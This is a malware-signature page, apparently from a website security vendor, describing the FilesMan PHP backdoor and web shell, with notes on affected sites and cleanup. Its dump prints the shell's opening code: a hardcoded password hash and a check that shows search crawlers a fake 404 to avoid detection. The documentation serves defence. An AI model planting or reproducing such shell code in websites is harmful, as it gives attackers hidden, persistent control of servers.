Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.backdoor.filesman.002.005

php.backdoor.filesman.002.005

PHP backdoors are server-side malicious scripts. The typical example of such backdoors are various File Managers, Web Shells, tools for bypassing admin login or various one-purpose scripts allowing the attacker to upload and run another type of malicious scripts. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as Web Shell environment) is visible in the browser, not the malicious code itself. It's very common, that backdoors don't have any visible signs in the site code and it's impossible to detect them by accessing the infected site from outside. Server level analysis is necessary in case of infection by this type of malware.

One of the most common backdoor type are File Managers. They're allowing the attacker to browse, edit, download or upload files placed on the server comfortly from the browser. In most cases, they've got comprehensible Graphical User Interface so even attackers without any deep computer skills are able to effectively work with them. There are also advanced File Managers with many more features implemented such as packing functions (e.g. zip), network tools and shells.

Affecting

Any PHP based web site (often through outdated WordPress, Joomla, osCommerce, Magento, Drupal and stolen passwords).

Cleanup

In case of standalone files, you can delete them safely. You can sign up with us and let our team remove the malware for you.

Dump

R$auth_pass = "7e9424bfa12d1f2ad32463ac1a80e407"; # test
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}